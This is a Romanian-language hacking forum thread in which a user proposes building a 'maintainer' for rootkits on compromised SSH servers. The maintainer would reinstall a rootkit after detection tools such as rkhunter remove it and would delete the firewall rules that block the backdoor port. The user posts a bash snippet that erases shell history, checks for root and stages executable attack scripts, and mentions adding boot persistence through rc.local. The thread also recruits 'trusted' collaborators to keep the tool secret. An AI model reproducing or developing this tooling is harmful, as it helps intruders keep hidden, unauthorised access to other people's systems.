[Linux] Rootkit / backdoor maintainer

[Flubber]

In primul rand as dori sa intreb cati dintre voi folosesc rootkit-uri pe ssh-uri. Daca da, ati experimentat ca victima sa foloseasca rootkit hunter, sau alte 'programe' de detectarea/curatarea rootkit-urilor? Daca da, ce spuneti daca am face un maintainer, adica un script mai complex la care, in caz ca rootkit-ul tau va fi scos, sau eventual port-ul pe care backdoor-ul rootkit-ului "tau" l-a deschis este blocat in firewall (sa zicem... iptables) eventual maintainer-ul sa scoata acea regula, si sa aduca totul la ... "normal" (pentru tine). Ce ziceti? Idei,sugestii,impotriviri,critici?

// Adaugare: Am uitat sa mentionez, cati dintre voi stiti BASH si un limbaj de programare?

// O alta adaugare: Am uitat sa mentionez ca eu deja lucrez la un programel de genul asta, dar nu este foarte elaborat, cu ajutorul lui cmiN am reusit sa fac ceva ceva .... nu foarte super ci foarte primitv, in Python si BASH.

Un mic snippet:

[B]a[/B](fisierul fiind executabil [chmod +x]):

#!/bin/bash
echo "[#] Flubber | 2010 | with help from cmiN -- many thanks."
echo "[#] Keep it private (DO NOT DISTRIBUTE) and enjoy."
echo "[*] Unsetting some history."
unset HISTFILE
unset HISTLOG
unset HISTSAVE
history -c
echo "[*] Please wait while I will check if you are root."
if [ "$(whoami)" != "root" ]; then
	echo "[-] Sorry, you are not root. This script requires for you to be root in order to execute. Exiting."
	exit 1;
else
	echo "[+] You are root. Proceeding further."
	echo "[*] Trying to get a way in this system and copy our 'toys' there."
	mkdir TARGET
	cp 1.py TARGET
	cp b.sh TARGET
	history -c
	echo "[+] Done. Also cleaned some history. Isn't that cute?"
	echo "[*] Chmodding our ev4l scr1p7s to execute."
	chmod +x TARGET/script.py
	chmod +x TARGET/scriptbash
	echo "[+] Ev4l scr1p7s chmodded to execute."
        [...] alte prostioare, cum ar fi adaugarea la boot-up prin rc.local si alte balarii [...]
fi

stiu ca verificarea cu whoami e o prostie, nu sunt sigur insa, nu am testat sa fac un user cu acces de root direct (uid 0, gid 0) si sa vad daca la whoami este user-ul si nu mai spune root (in cazul asta scriptul bash de initiere ar esua)

pareri, opinii, se ofera cineva sa imbunatatim, sunt curios cati se baga care AU HABAR si sa fie de incredere, insemnand sa nu dea aiurea script-urile, catre script kiddies (nu ca eu nu as fi unul) care sa imprastie mai departe, ci sa fie tinuta mai.. "secret" arhiva, adica sa o aiba si sa o foloseasca doar cei CARE MERITA

si aici ar fi fost in folos acea sectiune privata magica minune

as intra in mai multe detalii, dar mai intai sa vad daca a avut cineva experiente de genul, specificati si rootkit-ul daca doriti, eu unul fac asta pentru VTBoV05RPT0= (dati de 2 ori stiti voi ce)

[kasmir]

Majoritatea ne-am gandit la ideea asta, dar nu se stie cine poate s-o duca la perfectiune, ideea este ca o sa ai foarte mult de munca. Multa bafta!

[Flubber]

Majoritatea ne-am gandit la ideea asta, dar nu se stie cine poate s-o duca la perfectiune, ideea este ca o sa ai foarte mult de munca. Multa bafta!

Poftim? Pai thread-ul asta a fost mai mult ca o invitatie la proiect, sa ne punem mai multi (cat mai multi) cu experienta capatanile la contributie si sa-l facem foarte foarte complex si eficient, adaugandu-i diferite optiuni.

[kasmir]

Eu momentan nu pot, pentru sa sunt plecat din tara si nu am timp, mai am pana ma intorc in romania 47 zile oricum nu il terminati pana atunci, poate o sa ma implic si eu daca nu o sa fie prea tarziu!